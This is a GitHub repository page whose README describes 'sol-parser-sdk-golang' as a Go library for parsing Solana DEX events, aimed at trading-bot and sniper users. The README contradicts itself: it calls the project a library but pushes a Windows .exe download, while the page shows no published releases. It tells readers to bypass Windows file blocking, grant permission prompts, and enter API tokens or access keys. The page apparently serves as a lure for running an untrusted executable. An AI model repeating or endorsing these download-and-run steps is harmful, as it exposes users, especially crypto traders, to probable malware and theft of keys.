Skip to content

Azamrahm5140/sol-parser-sdk-golang

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🔷 sol-parser-sdk-golang - Parse Solana Events with Ease

Download

🚀 Getting Started

sol-parser-sdk-golang is a Go library for reading Solana DEX events in real time. It works with Yellowstone gRPC and helps you process live stream data from Solana tools such as Raydium, Pump.fun, PumpSwap, Jito, and related event feeds.

This project is meant for users who want a fast way to handle live Solana data on Windows. If you are not a developer, you can still use the release files from the download page and run the tool with a simple setup.

📥 Download

  1. Open the release page: Download the latest version
  2. On the release page, find the latest file for Windows
  3. Download the .exe file or the package marked for Windows
  4. Save it to a folder you can find again, such as Downloads or Desktop

If the release includes a zip file, right-click it and choose Extract All before you run the program.

🪟 Windows Setup

Before you run the app, make sure your system is ready:

  • Windows 10 or Windows 11
  • Internet access for live data feeds
  • At least 4 GB of RAM
  • Enough free space for the app and logs
  • Permission to run files from your Downloads folder

If Windows blocks the file, right-click the file, then choose Properties, and look for an Unblock option near the bottom. If you see it, select it and click Apply.

▶️ Run the App

Follow the steps below:

  1. Open the folder where you saved the file
  2. If the file is in a zip archive, extract it first
  3. Double-click the .exe file
  4. If Windows asks for permission, click Yes
  5. Wait for the app to start

If the release contains a folder with more than one file, keep the files together in the same folder. The app may need the extra files to run.

🧭 What This Tool Does

This SDK is built to help you work with Solana event data from live streams. It can support tasks such as:

  • Reading DEX events as they arrive
  • Watching live Solana activity
  • Tracking changes from Raydium and Pump.fun style markets
  • Handling fast data feeds from Yellowstone gRPC
  • Supporting copy-trading bots and sniper tools
  • Working with stream-based data from shred and shredstream sources

The goal is to keep event parsing fast and organized, so you can use the data in your own workflow.

🧩 Common Use Cases

You may find this useful if you want to:

  • Monitor new trades in real time
  • Track token launches on Pump.fun or Raydium Launchlab
  • Build a bot that reacts to live market events
  • Read stream data from gRPC without extra setup work
  • Process Solana DEX events with less manual work

📂 Basic Folder Layout

After you download and extract the release, you may see files like these:

  • sol-parser-sdk-golang.exe - the main app file
  • config.json - settings file
  • logs - folder with run history
  • README.txt - short setup help
  • examples - sample files or usage notes

Keep the files in one folder unless the release notes say otherwise.

⚙️ How to Use It

If the release is a ready-to-run app, use it like this:

  1. Download the latest release
  2. Extract the files if needed
  3. Open the folder
  4. Run the .exe file
  5. Enter your stream or server details if the app asks for them
  6. Start the live parser

If the release is a library package for another tool, place it in the same project folder as the rest of your files and follow the included example setup.

🔌 Input You May Need

The app may ask for details such as:

  • Yellowstone gRPC server address
  • API token or access key
  • Stream name or endpoint
  • Filter for a DEX or token pair
  • Output folder for saved data

Use the values from your provider or your own Solana setup.

🛠️ Troubleshooting

If the app does not open:

  • Make sure you extracted all files
  • Check that Windows did not block the file
  • Run the app again as a user with permission to open programs
  • Download the release again if the file looks broken

If the app opens and closes right away:

  • Keep all files in the same folder
  • Check for a required config file
  • Look for a missing dependency in the release notes
  • Try the newest release from the download page

If the app cannot connect to the stream:

  • Check your internet connection
  • Make sure the server address is correct
  • Confirm your access key or token
  • Try again after a short wait

📌 Supported Solana Event Sources

This project is based on topics and event paths that fit live Solana trading tools, including:

  • Yellowstone gRPC
  • Yellowstone gRPC for Go
  • Raydium
  • Raydium Launchpad
  • Raydium Launchlab
  • Pump.fun
  • PumpSwap
  • Jito
  • ShredStream
  • SWQoS feeds
  • Copy-trading bots
  • Sniper workflows
  • Bonk-related event streams
  • FNZero-related stream data

🧠 Good Practice

For best results:

  • Keep your release files in one folder
  • Use the latest version from the releases page
  • Save your config in a place you can find again
  • Restart the app after changing stream settings
  • Keep your internet connection stable during live parsing

🗂️ Version Updates

When a new release appears, repeat the same process:

  1. Open the release page
  2. Download the new Windows file
  3. Replace the old file if needed
  4. Keep your config files unless the update guide says to change them
  5. Run the new version

📎 Download Again

Visit the releases page to download the latest Windows version

📝 Project Details

  • Repository: sol-parser-sdk-golang
  • Description: High-performance Go library for parsing Solana DEX events in real-time via Yellowstone gRPC
  • Topics: bonk, copy-trading-bot, fnzero, grpc, jito, letsbonk, pumpfun, pumpswap, raydium, raydium-launchlab, raydium-launchpad, shreds, shredstream, sniper, streaming, swqos, yellowstone, yellowstonegrpc, yellowstonegrpc-golang

Releases

No releases published

Packages

 
 
 

Contributors

Languages